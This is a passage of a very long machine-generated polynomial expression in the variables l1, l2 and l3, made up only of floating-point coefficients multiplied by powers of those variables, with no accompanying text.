2.16634992165174e+27*l1**14*l2**8 - 1.21609357376792e+35*l1**14*l2**7*l3**7 - 3.75372524930155e+34*l1**14*l2**7*l3**6 + 4.45576487846497e+32*l1**14*l2**7*l3**5 + 1.08026159440589e+32*l1**14*l2**7*l3**4 + 2.53501131625408e+30*l1**14*l2**7*l3**3 + 1.11964303501753e+30*l1**14*l2**7*l3**2 - 9.91723390645807e+27*l1**14*l2**7*l3 - 4.15279443349632e+27*l1**14*l2**7 - 1.07654198872819e+35*l1**14*l2**6*l3**8 - 3.50185775114569e+34*l1**14*l2**6*l3**7 + 5.28087328578506e+32*l1**14*l2**6*l3**6 + 1.43936421735021e+32*l1**14*l2**6*l3**5 + 1.66207464807181e+30*l1**14*l2**6*l3**4 + 9.79132647971895e+29*l1**14*l2**6*l3**3 - 1.04159133318838e+28*l1**14*l2**6*l3**2 - 5.80108535130385e+27*l1**14*l2**6*l3 - 1.20563553037388e+25*l1**14*l2**6 - 8.52107281018506e+34*l1**14*l2**5*l3**9 - 2.77099224310411e+34*l1**14*l2**5*l3**8 + 4.6916640117975e+32*l1**14*l2**5*l3**7 + 1.2547785226603e+32*l1**14*l2**5*l3**6 + 1.961610201333e+30*l1**14*l2**5*l3**5 + 1.10756948383315e+30*l1**14*l2**5*l3**4 - 2.05823259876143e+28*l1**14*l2**5*l3**3 - 
9.77944868488226e+27*l1**14*l2**5*l3**2 + 2.29488446740086e+25*l1**14*l2**5*l3 + 1.41657132244664e+25*l1**14*l2**5 - 5.35918620783984e+34*l1**14*l2**4*l3**10 - 1.96059357567462e+34*l1**14*l2**4*l3**9 + 2.96536098045553e+32*l1**14*l2**4*l3**8 + 1.00183050971562e+32*l1**14*l2**4*l3**7 + 1.70347489591746e+30*l1**14*l2**4*l3**6 + 9.10476957216275e+29*l1**14*l2**4*l3**5 - 2.13464904655385e+28*l1**14*l2**4*l3**4 - 1.05067932594415e+28*l1**14*l2**4*l3**3 + 3.59768643220303e+25*l1**14*l2**4*l3**2 + 2.36655477780165e+25*l1**14*l2**4*l3 + 3.05538283413287e+22*l1**14*l2**4 - 3.40200825952267e+34*l1**14*l2**3*l3**11 - 1.06396027435271e+34*l1**14*l2**3*l3**10 + 2.42074400780979e+32*l1**14*l2**3*l3**9 + 4.96630772005438e+31*l1**14*l2**3*l3**8 + 9.1515356095163e+29*l1**14*l2**3*l3**7 + 7.34972724013275e+29*l1**14*l2**3*l3**6 - 1.8724465822578e+28*l1**14*l2**3*l3**5 - 9.60707555407316e+27*l1**14*l2**3*l3**4 + 5.38153406298594e+25*l1**14*l2**3*l3**3 + 3.12915172271658e+25*l1**14*l2**3*l3**2 - 1.17584754359162e+22*l1**14*l2**3*l3 - 2.18895016113291e+22*l1**14*l2**3 - 1.27137610702817e+34*l1**14*l2**2*l3**12 - 5.62348706407467e+33*l1**14*l2**2*l3**11 + 3.49019230562103e+31*l1**14*l2**2*l3**10 + 3.1896643741142e+31*l1**14*l2**2*l3**9 + 1.174004971576e+30*l1**14*l2**2*l3**8 + 4.09337156661975e+29*l1**14*l2**2*l3**7 - 1.47667253589813e+28*l1**14*l2**2*l3**6 - 6.63623275611717e+27*l1**14*l2**2*l3**5 + 5.03533355687353e+25*l1**14*l2**2*l3**4 + 2.74496964497602e+25*l1**14*l2**2*l3**3 - 3.4209485444825e+22*l1**14*l2**2*l3**2 - 3.37190003396965e+22*l1**14*l2**2*l3 - 2.93434155850889e+19*l1**14*l2**2 - 5.86907402789501e+33*l1**14*l2*l3**13 - 1.45415318442869e+33*l1**14*l2*l3**12 + 6.04693136104249e+31*l1**14*l2*l3**11 - 1.7264754877959e+30*l1**14*l2*l3**10 + 5.25519553358044e+28*l1**14*l2*l3**9 + 2.77816087849184e+29*l1**14*l2*l3**8 - 5.67307766842465e+27*l1**14*l2*l3**7 - 3.62011933993708e+27*l1**14*l2*l3**6 + 2.81586672397908e+25*l1**14*l2*l3**5 + 1.69142360453285e+25*l1**14*l2*l3**4 - 
3.72663571756877e+22*l1**14*l2*l3**3 - 2.98058300128048e+22*l1**14*l2*l3**2 - 6.95203517494355e+18*l1**14*l2*l3 + 1.08601489187053e+19*l1**14*l2 - 1.09390431944171e+33*l1**14*l3**14 - 3.69446551542808e+32*l1**14*l3**13 - 1.12273062380964e+31*l1**14*l3**12 + 2.84916652739516e+30*l1**14*l3**11 + 3.84905243167115e+29*l1**14*l3**10 + 3.89907213841282e+28*l1**14*l3**9 - 4.12620163401872e+27*l1**14*l3**8 - 1.00375338113644e+27*l1**14*l3**7 + 1.71167407745633e+25*l1**14*l3**6 + 5.69362666479402e+24*l1**14*l3**5 - 2.76755340414948e+22*l1**14*l3**4 - 1.29120342479293e+22*l1**14*l3**3 + 8.08466666501817e+18*l1**14*l3**2 + 8.70669460650702e+18*l1**14*l3 + 3.69259800664416e+15*l1**14 + 1.70371987278699e+33*l1**13*l2**15 + 6.27861110487279e+33*l1**13*l2**14*l3 + 6.24637301410453e+32*l1**13*l2**14 + 2.80895156648438e+34*l1**13*l2**13*l3**2 + 6.41254014275803e+33*l1**13*l2**13*l3 - 6.17157768737508e+29*l1**13*l2**13 + 3.39209478790915e+34*l1**13*l2**12*l3**3 + 6.73629482267921e+33*l1**13*l2**12*l3**2 + 9.57780609061998e+31*l1**13*l2**12*l3 + 4.40989454990626e+31*l1**13*l2**12 + 7.98614311359468e+34*l1**13*l2**11*l3**4 + 2.02039075408329e+34*l1**13*l2**11*l3**3 - 2.53793564952294e+32*l1**13*l2**11*l3**2 - 5.88120763730511e+31*l1**13*l2**11*l3 - 9.02374420548125e+28*l1**13*l2**11 + 8.93845878833494e+34*l1**13*l2**10*l3**5 + 2.2781590116183e+34*l1**13*l2**10*l3**4 - 7.28777541296572e+30*l1**13*l2**10*l3**3 + 3.25389935974722e+31*l1**13*l2**10*l3**2 - 2.58428287094177e+30*l1**13*l2**10*l3 - 8.55290639484457e+29*l1**13*l2**10 + 1.21459991510381e+35*l1**13*l2**9*l3**6 + 3.33007312318719e+34*l1**13*l2**9*l3**5 - 5.42222700978247e+32*l1**13*l2**9*l3**4 - 1.23755259472725e+32*l1**13*l2**9*l3**3 - 4.95923690408978e+29*l1**13*l2**9*l3**2 - 3.04723712671824e+29*l1**13*l2**9*l3 - 7.83415789629145e+26*l1**13*l2**9 + 1.2263964869696e+35*l1**13*l2**8*l3**7 + 3.49649807075338e+34*l1**13*l2**8*l3**6 - 4.21937534387845e+32*l1**13*l2**8*l3**5 - 8.82853417740149e+31*l1**13*l2**8*l3**4 - 
4.23608104018497e+30*l1**13*l2**8*l3**3 - 1.55041221056108e+30*l1**13*l2**8*l3**2 + 1.90142505509005e+28*l1**13*l2**8*l3 + 6.34386110210437e+27*l1**13*l2**8 + 1.19438832574563e+35*l1**13*l2**7*l3**8 + 3.51145270345639e+34*l1**13*l2**7*l3**7 - 6.56224758674951e+32*l1**13*l2**7*l3**6 - 1.61216699595226e+32*l1**13*l2**7*l3**5 - 2.21799130749538e+30*l1**13*l2**7*l3**4 - 1.09056826858562e+30*l1**13*l2**7*l3**3 + 1.7991079315316e+28*l1**13*l2**7*l3**2 + 7.38823325211347e+27*l1**13*l2**7*l3 + 8.92375394479665e+24*l1**13*l2**7 + 9.7200254014396e+34*l1**13*l2**6*l3**9 + 3.05572994898061e+34*l1**13*l2**6*l3**8 - 5.40678947231857e+32*l1**13*l2**6*l3**7 - 1.47765501187285e+32*l1**13*l2**6*l3**6 - 3.57324758127659e+30*l1**13*l2**6*l3**5 - 1.51846979787681e+30*l1**13*l2**6*l3**4 + 3.94034795391202e+28*l1**13*l2**6*l3**3 + 1.47487810767298e+28*l1**13*l2**6*l3**2 - 6.81044779849898e+25*l1**13*l2**6*l3 - 2.61640761935635e+25*l1**13*l2**6 + 7.61300607928969e+34*l1**13*l2**5*l3**10 + 2.27327907884153e+34*l1**13*l2**5*l3**9 - 5.1911495885504e+32*l1**13*l2**5*l3**8 - 1.24299560657244e+32*l1**13*l2**5*l3**7 - 2.42498821881224e+30*l1**13*l2**5*l3**6 - 1.27903079728065e+30*l1**13*l2**5*l3**5 + 3.9832696719066e+28*l1**13*l2**5*l3**4 + 1.61398650426576e+28*l1**13*l2**5*l3**3 - 9.41135720335875e+25*l1**13*l2**5*l3**2 - 4.13355279811491e+25*l1**13*l2**5*l3 - 3.42246818321612e+22*l1**13*l2**5 + 4.33498663243643e+34*l1**13*l2**4*l3**11 + 1.6081914665237e+34*l1**13*l2**4*l3**10 - 2.45202000402842e+32*l1**13*l2**4*l3**9 - 9.76331137894563e+31*l1**13*l2**4*l3**8 - 2.68299366960786e+30*l1**13*l2**4*l3**7 - 1.05858723577077e+30*l1**13*l2**4*l3**6 + 4.20694033907392e+28*l1**13*l2**4*l3**5 + 1.6598945104723e+28*l1**13*l2**4*l3**4 - 1.49525001209591e+26*l1**13*l2**4*l3**3 - 6.2320014493243e+25*l1**13*l2**4*l3**2 + 1.04571159966584e+23*l1**13*l2**4*l3 + 5.41802021376568e+22*l1**13*l2**4 + 2.95142207049174e+34*l1**13*l2**3*l3**12 + 7.69334361349383e+33*l1**13*l2**3*l3**11 - 
2.63397481350737e+32*l1**13*l2**3*l3**10 - 3.38611806277542e+31*l1**13*l2**3*l3**9 - 9.80887276992704e+29*l1**13*l2**3*l3**8 - 8.6503845615754e+29*l1**13*l2**3*l3**7 + 3.07782129562185e+28*l1**13*l2**3*l3**6 + 1.36206554676264e+28*l1**13*l2**3*l3**5 - 1.43718237221222e+26*l1**13*l2**3*l3**4 - 6.2933727735783e+25*l1**13*l2**3*l3**3 + 1.72274388144847e+23*l1**13*l2**3*l3**2 + 8.97322140079802e+22*l1**13*l2**3*l3 + 5.15496426702566e+19*l1**13*l2**3 + 9.25892201799613e+33*l1**13*l2**2*l3**13 + 4.63739900471366e+33*l1**13*l2**2*l3**12 + 6.50780675182871e+30*l1**13*l2**2*l3**11 - 3.44969470492726e+31*l1**13*l2**2*l3**10 - 1.78960131019427e+30*l1**13*l2**2*l3**9 - 3.91950603099378e+29*l1**13*l2**2*l3**8 + 2.46039455117675e+28*l1**13*l2**2*l3**7 + 8.67421536379352e+27*l1**13*l2**2*l3**6 - 1.19923252956157e+26*l1**13*l2**2*l3**5 - 4.88736417723235e+25*l1**13*l2**2*l3**4 + 2.12780280299682e+23*l1**13*l2**2*l3**3 + 1.01434681365905e+23*l1**13*l2**2*l3**2 - 5.58460298438402e+19*l1**13*l2**2*l3 - 4.68007380036471e+19*l1**13*l2**2 + 4.95235427340378e+33*l1**13*l2*l3**14 + 8.52565120967254e+32*l1**13*l2*l3**13 - 6.69268866542506e+31*l1**13*l2*l3**12 + 8.4695046297898e+30*l1**13*l2*l3**11 + 5.43087079991112e+28*l1**13*l2*l3**10 - 3.45058224854424e+29*l1**13*l2*l3**9 + 7.74514240269792e+27*l1**13*l2*l3**8 + 4.761891433076e+27*l1**13*l2*l3**7 - 5.6629588371893e+25*l1**13*l2*l3**6 - 2.78104042179903e+25*l1**13*l2*l3**5 + 1.43160030769209e+23*l1**13*l2*l3**4 + 7.14707524824856e+22*l1**13*l2*l3**3 - 9.02917534468221e+19*l1**13*l2*l3**2 - 5.84406088545801e+19*l1**13*l2*l3 - 1.72766654118567e+16*l1**13*l2 + 8.27953321208583e+32*l1**13*l3**15 + 3.08549042902291e+32*l1**13*l3**14 + 1.51725930412119e+31*l1**13*l3**13 - 4.02981966777684e+30*l1**13*l3**12 - 5.06986972304937e+29*l1**13*l3**11 - 2.0081187452337e+28*l1**13*l3**10 + 6.41821041399177e+27*l1**13*l3**9 + 1.16133198785428e+27*l1**13*l3**8 - 3.43816941768126e+25*l1**13*l3**7 - 8.65006151485434e+24*l1**13*l3**6 + 
8.52920648251851e+22*l1**13*l3**5 + 2.73244317471311e+22*l1**13*l3**4 - 7.81346551061643e+19*l1**13*l3**3 - 3.1726557818259e+19*l1**13*l3**2 + 1.19946817897086e+16*l1**13*l3 + 6.9621582706305e+15*l1**13 - 1.15064719555944e+33*l1**12*l2**16 - 4.87914531224948e+33*l1**12*l2**15*l3 - 1.71171314245447e+32*l1**12*l2**15 - 2.27264330219826e+34*l1**12*l2**14*l3**2 - 5.55271520465418e+33*l1**12*l2**14*l3 - 1.63480489846314e+31*l1**12*l2**14 - 2.19145571013999e+34*l1**12*l2**13*l3**3 - 2.81250449534795e+33*l1**12*l2**13*l3**2 - 9.64717755307173e+31*l1**12*l2**13*l3 - 5.00051268463716e+31*l1**12*l2**13 - 6.73592557248902e+34*l1**12*l2**12*l3**4 - 1.70030914184355e+34*l1**12*l2**12*l3**3 + 2.6044367010942e+32*l1**12*l2**12*l3**2 + 7.67803575150169e+31*l1**12*l2**12*l3 + 4.07373799547042e+29*l1**12*l2**12 - 6.55154075502592e+34*l1**12*l2**11*l3**5 - 1.46534252524007e+34*l1**12*l2**11*l3**4 - 1.1623289601167e+32*l1**12*l2**11*l3**3 - 7.84036486652692e+31*l1**12*l2**11*l3**2 + 3.02040459850163e+30*l1**12*l2**11*l3 + 1.01037051695304e+30*l1**12*l2**11 - 1.03549025179331e+35*l1**12*l2**10*l3**6 - 2.69945987467944e+34*l1**12*l2**10*l3**5 + 5.87455299985801e+32*l1**12*l2**10*l3**4 + 1.46477739516941e+32*l1**12*l2**10*l3**3 + 2.01288792077727e+29*l1**12*l2**10*l3**2 + 4.70262681455506e+27*l1**12*l2**10*l3 - 1.7782982741217e+27*l1**12*l2**10 - 1.03508602000615e+35*l1**12*l2**9*l3**7 - 2.71605864243985e+34*l1**12*l2**9*l3**6 + 2.82882081897178e+32*l1**12*l2**9*l3**5 + 3.60102444940035e+31*l1**12*l2**9*l3**4 + 5.82735334772221e+30*l1**12*l2**9*l3**3 + 1.95719099829408e+30*l1**12*l2**9*l3**2 - 2.77444405161669e+28*l1**12*l2**9*l3 - 8.35677427838442e+27*l1**12*l2**9 - 1.07854093712625e+35*l1**12*l2**8*l3**8 - 3.00142101969076e+34*l1**12*l2**8*l3**7 + 6.729009222426e+32*l1**12*l2**8*l3**6 + 1.64723448523233e+32*l1**12*l2**8*l3**5 + 2.06718487747462e+30*l1**12*l2**8*l3**4 + 8.46879917549081e+29*l1**12*l2**8*l3**3 - 2.29400656644255e+28*l1**12*l2**8*l3**2 - 
7.25922582189705e+27*l1**12*l2**8*l3 + 2.68515638718719e+24*l1**12*l2**8 - 9.66871905922266e+34*l1**12*l2**7*l3**9 - 2.70468962342587e+34*l1**12*l2**7*l3**8 + 5.73170244905123e+32*l1**12*l2**7*l3**7 + 1.29671584425345e+32*l1**12*l2**7*l3**6 + 4.92673097926871e+30*l1**12*l2**7*l3**5 + 1.85058703780509e+30*l1**12*l2**7*l3**4 - 5.89803082637887e+28*l1**12*l2**7*l3**3 - 1.89866128511493e+28*l1**12*l2**7*l3**2 + 1.32345969069485e+26*l1**12*l2**7*l3 + 4.04754032174008e+25*l1**12*l2**7 - 7.40805278950946e+34*l1**12*l2**6*l3**10 - 2.31018466364076e+34*l1**12*l2**6*l3**9 + 4.97704375490416e+32*l1**12*l2**6*l3**8 + 1.44750060636756e+32*l1**12*l2**6*l3**7 + 3.50218319645532e+30*l1**12*l2**6*l3**6 + 1.35719962155258e+30*l1**12*l2**6*l3**5 - 5.75279157290892e+28*l1**12*l2**6*l3**4 - 1.96092880131473e+28*l1**12*l2**6*l3**3 + 1.68818775140969e+26*l1**12*l2**6*l3**2 + 5.68051679945201e+25*l1**12*l2**6*l3 + 8.75536860050862e+21*l1**12*l2**6 - 5.9074341505248e+34*l1**12*l2**5*l3**11 - 1.56915200430954e+34*l1**12*l2**5*l3**10 + 4.87232942530673e+32*l1**12*l2**5*l3**9 + 9.34242405904551e+31*l1**12*l2**5*l3**8 + 2.84837706898054e+30*l1**12*l2**5*l3**7 + 1.4140337725555e+30*l1**12*l2**5*l3**6 - 6.52523517532198e+28*l1**12*l2**5*l3**5 - 2.30406293689164e+28*l1**12*l2**5*l3**4 + 2.88555546072294e+26*l1**12*l2**5*l3**3 + 9.82654278939087e+25*l1**12*l2**5*l3**2 - 3.13451472769245e+23*l1**12*l2**5*l3 - 1.05876018747643e+23*l1**12*l2**5 - 2.89443740238344e+34*l1**12*l2**4*l3**12 - 1.18733900393276e+34*l1**12*l2**4*l3**11 + 1.34561631207296e+32*l1**12*l2**4*l3**10 + 8.91232529234061e+31*l1**12*l2**4*l3**9 + 3.3762320452669e+30*l1**12*l2**4*l3**8 + 9.55923600320355e+29*l1**12*l2**4*l3**7 - 5.91252230004336e+28*l1**12*l2**4*l3**6 - 2.01166279033635e+28*l1**12*l2**4*l3**5 + 3.0239129297559e+26*l1**12*l2**4*l3**4 + 1.06277682980872e+26*l1**12*l2**4*l3**3 - 4.79292304697422e+23*l1**12*l2**4*l3**2 - 1.74962534051322e+23*l1**12*l2**4*l3 - 2.8664660961022e+19*l1**12*l2**4 - 
2.28526999291269e+34*l1**12*l2**3*l3**13 - 4.37665890150911e+33*l1**12*l2**3*l3**12 + 2.67429299125017e+32*l1**12*l2**3*l3**11 + 8.37023364671806e+30*l1**12*l2**3*l3**10 + 6.03493817830709e+29*l1**12*l2**3*l3**9 + 9.27725691095825e+29*l1**12*l2**3*l3**8 - 3.87073489288705e+28*l1**12*l2**3*l3**7 - 1.61003349109482e+28*l1**12*l2**3*l3**6 + 2.62763625275269e+26*l1**12*l2**3*l3**5 + 9.82569321604229e+25*l1**12*l2**3*l3**4 - 6.25986660029388e+23*l1**12*l2**3*l3**3 - 2.33334322949226e+23*l1**12*l2**3*l3**2 + 3.47899648764347e+20*l1**12*l2**3*l3 + 1.35507953945039e+20*l1**12*l2**3 - 5.42789703031354e+33*l1**12*l2**2*l3**14 - 3.62740079667309e+33*l1**12*l2**2*l3**13 - 5.25261552926854e+31*l1**12*l2**2*l3**12 + 3.84863282454899e+31*l1**12*l2**2*l3**11 + 2.31670620731107e+30*l1**12*l2**2*l3**10 + 2.56908974111604e+29*l1**12*l2**2*l3**9 - 3.31404169173995e+28*l1**12*l2**2*l3**8 - 9.20911357092443e+27*l1**12*l2**2*l3**7 + 2.04137801336026e+26*l1**12*l2**2*l3**6 + 6.81173093117874e+25*l1**12*l2**2*l3**5 - 5.65739187568087e+23*l1**12*l2**2*l3**4 - 2.06215962969696e+23*l1**12*l2**2*l3**3 + 5.14102161546095e+20*l1**12*l2**2*l3**2 + 2.01885732212296e+20*l1**12*l2**2*l3 + 1.18827609314568e+16*l1**12*l2**2 - 3.68986187669315e+33*l1**12*l2*l3**15 - 2.73467498516293e+32*l1**12*l2*l3**14 + 6.70131235079011e+31*l1**12*l2*l3**13 - 1.55896847231873e+31*l1**12*l2*l3**12 - 2.44678754729186e+29*l1**12*l2*l3**11 + 3.97193897488431e+29*l1**12*l2*l3**10 - 7.84940577485815e+27*l1**12*l2*l3**9 - 5.43579518601739e+27*l1**12*l2*l3**8 + 8.26061551994606e+25*l1**12*l2*l3**7 + 3.75501060350499e+25*l1**12*l2*l3**6 - 3.18149690417014e+23*l1**12*l2*l3**5 - 1.2917196408323e+23*l1**12*l2*l3**4 + 4.44036657999888e+20*l1**12*l2*l3**3 + 1.77978225342475e+20*l1**12*l2*l3**2 - 1.40633026716987e+17*l1**12*l2*l3 - 5.12196232812315e+16*l1**12*l2 - 5.45919874500137e+32*l1**12*l3**16 - 2.49178003947566e+32*l1**12*l3**15 - 1.63854756055254e+31*l1**12*l3**14 + 5.22902618494509e+30*l1**12*l3**13 + 
5.62750103062424e+29*l1**12*l3**12 - 1.23762236916409e+28*l1**12*l3**11 - 8.27440115745077e+27*l1**12*l3**10 - 1.07350229512091e+27*l1**12*l3**9 + 5.44612328823947e+25*l1**12*l3**8 + 1.07000990940081e+25*l1**12*l3**7 - 1.82006891747171e+23*l1**12*l3**6 - 4.52091297258949e+22*l1**12*l3**5 + 2.7318792364778e+20*l1**12*l3**4 + 7.81556754316308e+19*l1**12*l3**3 - 1.38610365731162e+17*l1**12*l3**2 - 3.92884342369648e+16*l1**12*l3 + 7530036559070.65*l1**12 + 5.42058269640244e+32*l1**11*l2**17 + 3.56795126365879e+33*l1**11*l2**16*l3 - 1.53723674875544e+32*l1**11*l2**16 + 1.57767103274068e+34*l1**11*l2**15*l3**2 + 4.51363456895408e+33*l1**11*l2**15*l3 + 3.01340656929508e+31*l1**11*l2**15 + 1.08311403637176e+34*l1**11*l2**14*l3**3 - 5.359680392305e+32*l1**11*l2**14*l3**2 + 7.25806720957446e+31*l1**11*l2**14*l3 + 4.92622604511646e+31*l1**11*l2**14 + 5.07533503053003e+34*l1**11*l2**13*l3**4 + 1.37512021644675e+34*l1**11*l2**13*l3**3 - 2.27934465352059e+32*l1**11*l2**13*l3**2 - 8.96101241598451e+31*l1**11*l2**13*l3 - 6.93782917909263e+29*l1**11*l2**13 + 3.81273259070052e+34*l1**11*l2**12*l3**5 + 6.31786722078706e+33*l1**11*l2**12*l3**4 + 2.16571695974337e+32*l1**11*l2**12*l3**3 + 1.21783661948892e+32*l1**11*l2**12*l3**2 - 2.83323622935213e+30*l1**11*l2**12*l3 - 1.04458928514121e+30*l1**11*l2**12 + 7.70043180374777e+34*l1**11*l2**11*l3**6 + 2.00053392758727e+34*l1**11*l2**11*l3**5 - 5.90216488445483e+32*l1**11*l2**11*l3**4 - 1.7352005313449e+32*l1**11*l2**11*l3**3 + 2.4574051262987e+29*l1**11*l2**11*l3**2 + 4.10625218258057e+29*l1**11*l2**11*l3 + 4.80019102838924e+27*l1**11*l2**11 + 7.2994154967092e+34*l1**11*l2**10*l3**7 + 1.73127421544889e+34*l1**11*l2**10*l3**6 - 6.10872086271573e+31*l1**11*l2**10*l3**5 + 3.77469275690256e+31*l1**11*l2**10*l3**4 - 6.78765807307964e+30*l1**11*l2**10*l3**3 - 2.28665446130664e+30*l1**11*l2**10*l3**2 + 3.21206564744388e+28*l1**11*l2**10*l3 + 9.537476774589e+27*l1**11*l2**10 + 8.22106397144252e+34*l1**11*l2**9*l3**8 + 
2.18285165068419e+34*l1**11*l2**9*l3**7 - 6.43861529330937e+32*l1**11*l2**9*l3**6 - 1.61918441923659e+32*l1**11*l2**9*l3**5 - 8.57218952946743e+29*l1**11*l2**9*l3**4 - 2.06582455487515e+29*l1**11*l2**9*l3**3 + 2.22184393738843e+28*l1**11*l2**9*l3**2 + 4.90652359472299e+27*l1**11*l2**9*l3 - 2.14355502372086e+25*l1**11*l2**9 + 7.67535105877148e+34*l1**11*l2**8*l3**9 + 2.04642342251642e+34*l1**11*l2**8*l3**8 - 4.08169361524659e+32*l1**11*l2**8*l3**7 - 8.65692341609763e+31*l1**11*l2**8*l3**6 - 6.18602189436873e+30*l1**11*l2**8*l3**5 - 2.07582922780033e+30*l1**11*l2**8*l3**4 + 7.28293862141134e+28*l1**11*l2**8*l3**3 + 2.14759987551288e+28*l1**11*l2**8*l3**2 - 1.93142333763478e+26*l1**11*l2**8*l3 - 5.30760613878163e+25*l1**11*l2**8 + 6.65365521671513e+34*l1**11*l2**7*l3**10 + 1.78720978899768e+34*l1**11*l2**7*l3**9 - 5.54384236763541e+32*l1**11*l2**7*l3**8 - 1.23357877116619e+32*l1**11*l2**7*l3**7 - 2.84996846188098e+30*l1**11*l2**7*l3**6 - 1.12008212625168e+30*l1**11*l2**7*l3**5 + 6.24106880146733e+28*l1**11*l2**7*l3**4 + 1.86771213909204e+28*l1**11*l2**7*l3**3 - 2.25160971050599e+26*l1**11*l2**7*l3**2 - 6.10963475062795e+25*l1**11*l2**7*l3 + 5.70492547353084e+22*l1**11*l2**7 + 4.76929199250708e+34*l1**11*l2**6*l3**11 + 1.52117474407054e+34*l1**11*l2**6*l3**10 - 3.13297315377128e+32*l1**11*l2**6*l3**9 - 1.09186948478093e+32*l1**11*l2**6*l3**8 - 4.49438060106928e+30*l1**11*l2**6*l3**7 - 1.40763676247819e+30*l1**11*l2**6*l3**6 + 8.5549236669713e+28*l1**11*l2**6*l3**5 + 2.61429016053311e+28*l1**11*l2**6*l3**4 - 4.32107927435018e+26*l1**11*l2**6*l3**3 - 1.26993791695142e+26*l1**11*l2**6*l3**2 + 6.17461059624908e+23*l1**11*l2**6*l3 + 1.68280539896725e+23*l1**11*l2**6 + 4.01282732534657e+34*l1**11*l2**5*l3**12 + 8.82070507935563e+33*l1**11*l2**5*l3**11 - 4.31217378567339e+32*l1**11*l2**5*l3**10 - 5.17743551352117e+31*l1**11*l2**5*l3**9 - 1.91637356883514e+30*l1**11*l2**5*l3**8 - 1.21751209939954e+30*l1**11*l2**5*l3**7 + 7.15399430133953e+28*l1**11*l2**5*l3**6 + 
2.3926028559002e+28*l1**11*l2**5*l3**5 - 4.49294960706607e+26*l1**11*l2**5*l3**4 - 1.3907412818535e+26*l1**11*l2**5*l3**3 + 8.97755609711969e+23*l1**11*l2**5*l3**2 + 2.60828985591366e+23*l1**11*l2**5*l3 - 1.09559842336007e+20*l1**11*l2**5 + 1.54880843892643e+34*l1**11*l2**4*l3**13 + 8.19809625626277e+33*l1**11*l2**4*l3**12 + 8.56798859941509e+28*l1**11*l2**4*l3**11 - 8.10607259404814e+31*l1**11*l2**4*l3**10 - 3.93546506904436e+30*l1**11*l2**4*l3**9 - 6.72940338355817e+29*l1**11*l2**4*l3**8 + 6.95860407761519e+28*l1**11*l2**4*l3**7 + 2.02948986742254e+28*l1**11*l2**4*l3**6 - 4.69764660716045e+26*l1**11*l2**4*l3**5 - 1.44990388710927e+26*l1**11*l2**4*l3**4 + 1.30469373666867e+24*l1**11*l2**4*l3**3 + 3.97702740329519e+23*l1**11*l2**4*l3**2 - 1.04921969141064e+21*l1**11*l2**4*l3 - 2.91149225193441e+20*l1**11*l2**4 + 1.58854813882185e+34*l1**11*l2**3*l3**14 + 1.5175016763891e+33*l1**11*l2**3*l3**13 - 2.56154823733414e+32*l1**11*l2**3*l3**12 + 2.03454636364827e+31*l1**11*l2**3*l3**11 + 2.24738117352253e+29*l1**11*l2**3*l3**10 - 9.3788299330296e+29*l1**11*l2**3*l3**9 + 3.66042439855247e+28*l1**11*l2**3*l3**8 + 1.60034891763539e+28*l1**11*l2**3*l3**7 - 3.45488950313478e+26*l1**11*l2**3*l3**6 - 1.19824326216273e+26*l1**11*l2**3*l3**5 + 1.2450445290154e+24*l1**11*l2**3*l3**4 + 4.03066971357547e+23*l1**11*l2**3*l3**3 - 1.52728699832047e+21*l1**11*l2**3*l3**2 - 4.61498546566703e+20*l1**11*l2**3*l3 + 1.27143158860857e+17*l1**11*l2**3 + 2.40256434758839e+33*l1**11*l2**2*l3**15 + 2.78402175220784e+33*l1**11*l2**2*l3**14 + 8.52533620780816e+31*l1**11*l2**2*l3**13 - 4.35726941546106e+31*l1**11*l2**2*l3**12 - 2.60492678600695e+30*l1**11*l2**2*l3**11 - 2.6925870943037e+28*l1**11*l2**2*l3**10 + 3.7772742646731e+28*l1**11*l2**2*l3**9 + 7.81236191525395e+27*l1**11*l2**2*l3**8 - 2.745718764564e+26*l1**11*l2**2*l3**7 - 7.63224555154382e+25*l1**11*l2**2*l3**6 + 1.0325442132754e+24*l1**11*l2**2*l3**5 + 3.16347660390928e+23*l1**11*l2**2*l3**4 - 1.68260292213884e+21*l1**11*l2**2*l3**3 - 
5.19066573423719e+20*l1**11*l2**2*l3**2 + 7.70403397786904e+17*l1**11*l2**2*l3 + 1.94163900832043e+17*l1**11*l2**2 + 2.40356382178743e+33*l1**11*l2*l3**16 - 1.52428901481344e+32*l1**11*l2*l3**15 - 5.95741244396314e+31*l1**11*l2*l3**14 + 2.10939696144206e+31*l1**11*l2*l3**13 + 4.40829429772007e+29*l1**11*l2*l3**12 - 4.28406820725008e+29*l1**11*l2*l3**11 + 5.53916939320215e+27*l1**11*l2*l3**10 + 5.51164648907787e+27*l1**11*l2*l3**9 - 9.07372590886294e+25*l1**11*l2*l3**8 - 4.25651944842461e+25*l1**11*l2*l3**7 + 4.95977587123762e+23*l1**11*l2*l3**6 + 1.83473649643381e+23*l1**11*l2*l3**5 - 1.10058937807594e+21*l1**11*l2*l3**4 - 3.6586851908742e+20*l1**11*l2*l3**3 + 8.27753688217326e+17*l1**11*l2*l3**2 + 2.26307677710691e+17*l1**11*l2*l3 - 79065383870242.8*l1**11*l2 + 3.20992749072703e+32*l1**11*l3**17 + 1.96410309303258e+32*l1**11*l3**16 + 1.44183289761493e+31*l1**11*l3**15 - 5.98873455955441e+30*l1**11*l3**14 - 5.28716824560397e+29*l1**11*l3**13 + 4.80767920853915e+28*l1**11*l3**12 + 8.96974835131416e+27*l1**11*l3**11 + 7.37038105237305e+26*l1**11*l3**10 - 7.04808367818499e+25*l1**11*l3**9 - 1.07294993304813e+25*l1**11*l3**8 + 2.9814769992467e+23*l1**11*l3**7 + 5.98393178445597e+22*l1**11*l3**6 - 6.26199669836866e+20*l1**11*l3**5 - 1.42999896523037e+20*l1**11*l3**4 + 5.509163814443e+17*l1**11*l3**3 + 1.22576766566443e+17*l1**11*l3**2 - 135325221050004.0*l1**11*l3 - 18604524931709.8*l1**11 - 7.65153025702779e+31*l1**10*l2**18 - 2.58008711845471e+33*l1**10*l2**17*l3 + 3.00791760198447e+32*l1**10*l2**17 - 9.10132310906708e+33*l1**10*l2**16*l3**2 - 3.42249949974261e+33*l1**10*l2**16*l3 - 3.61844432676004e+31*l1**10*l2**16 - 3.62975713281504e+33*l1**10*l2**15*l3**3 + 2.55500586869347e+33*l1**10*l2**15*l3**2 - 3.40760895979867e+31*l1**10*l2**15*l3 - 4.22328688885701e+31*l1**10*l2**15 - 3.41904020848707e+34*l1**10*l2**14*l3**4 - 1.08098131996222e+34*l1**10*l2**14*l3**3 + 1.61737536677441e+32*l1**10*l2**14*l3**2 + 9.16081683657408e+31*l1**10*l2**14*l3 + 
